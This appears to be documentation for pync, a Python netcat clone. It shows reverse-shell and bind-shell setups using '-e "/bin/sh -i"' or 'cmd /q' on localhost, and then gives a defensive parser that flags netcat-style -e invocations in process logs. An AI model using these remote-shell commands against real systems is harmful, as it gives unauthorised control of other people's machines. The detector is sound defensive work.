Remote Command Execution

Warning: The -e option allows you to execute a process and have that process' stdin/stdout/stderr connected to the network socket.
Any data coming in from the network goes to the process' stdin, and any data the process writes to stdout/stderr goes out to the network.
For example, we can create an interactive shell to execute commands on a remote machine.
A Simple Reverse Shell

Create a local server that will listen for the reverse shell connection:

Unix:
```
pync -vl localhost 8000
```

Windows:
```
py -m pync -vl localhost 8000
```

Python:
```python
import pync
pync.run('-vl localhost 8000')
```
On another console, connect back to the server and execute the shell:

Unix:
```
pync -ve "/bin/sh -i" localhost 8000
```

Windows:
```
py -m pync -ve "cmd /q" localhost 8000
```

Python:
```python
# reverse_shell.py
import platform
import pync

# Pick the interactive shell for the current platform.
command = '/bin/sh -i'
if platform.system() == 'Windows':
    command = 'cmd /q'

# -v: verbose, -e: run the command with stdin/stdout/stderr bound to the socket.
pync.run('-ve "{}" localhost 8000'.format(command))
```
There should now be a prompt on the server console that allows you to remotely execute commands on the client machine.
A Simple Bind Shell

Create a server on port 8000 that executes the shell upon connection:

Unix:
```
pync -vle "/bin/sh -i" localhost 8000
```

Windows:
```
py -m pync -vle "cmd /q" localhost 8000
```

Python:
```python
# bind_shell.py
import platform
import pync

# Pick the interactive shell for the current platform.
command = '/bin/sh -i'
if platform.system() == 'Windows':
    command = 'cmd /q'

# -v: verbose, -l: listen, -e: run the command once a client connects.
pync.run('-vle "{}" localhost 8000'.format(command))
```
On another console, connect to the server to interact with the shell:

Unix:
```
pync -v localhost 8000
```

Windows:
```
py -m pync -v localhost 8000
```

Python:
```python
import pync
pync.run('-v localhost 8000')
```
There should now be a prompt on the client console that allows you to remotely execute commands on the server machine.
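Because the -e option in both the reverse and bind shell forms above is what turns a plain connection into command execution, defenders often want to spot it in process-creation telemetry. The following is an added example, not part of pync, that parses pync/netcat-style command lines (including the `py -m pync` form and combined flags such as `-vle`), reports whether the invocation is a bind (`-l`) or reverse shell, and extracts the program handed to -e; the tool names it recognises and the sample command lines are constructed for this example.

```python
import shlex

# Executables treated as pync/netcat-style tools (an assumption for this example).
NETCAT_NAMES = {"pync", "nc", "ncat", "netcat"}


def classify_command(cmdline):
    """Describe a pync/netcat-style call that uses -e, or return None.

    Result keys: mode ("bind" if -l is present, else "reverse"), exec (the
    program passed to -e), host and port (the trailing positional arguments).
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes: not parseable as a shell command line
    # Normalise "python -m pync ..." / "py -m pync ..." to a bare "pync ...".
    if len(argv) >= 3 and argv[1] == "-m" and argv[2] == "pync":
        argv = argv[2:]
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listen, exec_cmd, positional = False, None, []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            flags = tok[1:]
            if "l" in flags:
                listen = True
            if "e" in flags and i + 1 < len(argv):
                exec_cmd = argv[i + 1]  # -e consumes the next argument
                i += 1
        else:
            positional.append(tok)
        i += 1
    if exec_cmd is None:
        return None
    host = positional[0] if len(positional) >= 2 else None
    port = positional[-1] if positional else None
    return {"mode": "bind" if listen else "reverse", "exec": exec_cmd,
            "host": host, "port": port}


def triage(cmdlines):
    """Return (command line, classification) pairs for every -e invocation."""
    return [(c, r) for c in cmdlines if (r := classify_command(c)) is not None]
```

Feeding the command lines from this page into `triage` flags the two `-e` forms and ignores the plain `-v`/`-vl` listeners and clients.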